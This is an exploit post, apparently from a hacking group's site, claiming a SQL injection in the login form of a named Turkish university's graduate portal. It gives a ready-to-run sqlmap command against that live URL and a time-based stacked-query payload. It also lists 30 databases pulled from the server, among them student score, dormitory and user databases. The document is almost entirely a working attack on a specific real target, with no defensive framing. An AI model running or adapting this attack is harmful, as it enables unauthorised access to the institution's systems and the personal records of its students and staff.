#####################################################
# Exploit Title: mezun.nny.edu.tr Post SQL Injection Vulnerability
# Date: 07.12.2020
# Exploit Author: Nobody 
# Tested on: Linux / Windows
#####################################################

# Exploit : 
# sqlmap -u "https://mezun.nny.edu.tr/login.php" --forms --batch --random-agent --dbs --tamper=between,space2comment

Parameter: username (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: username=PqkU';WAITFOR DELAY '0:0:5'--&babaadi=&dtarihi=KhKc

available databases [30]:
[*] [!]
[*] ac?tvitydb
[*] cateringdb
[*] cateringdbtest
[*] dormdb
[*] GKAPIDB
[*] graduated
[*] intoffice
[*] itdb
[*] itdbtest
[*] logdb
[*] master
[*] model
[*] msdb
[*] ogs
[*] promotion
[*] qualitydb
[*] records
[*] ReportServer$BTUSERSQL
[*] ReportServer$BTUSERSQLTempDB
[*] saffairsdb
[*] spos
[*] spostest
[*] studentscoredb
[*] summerschooldb
[*] surveydb
[*] tempdb
[*] transition
[*] userdb
[*] webdb

#####################################################

# SpyHackerZ.org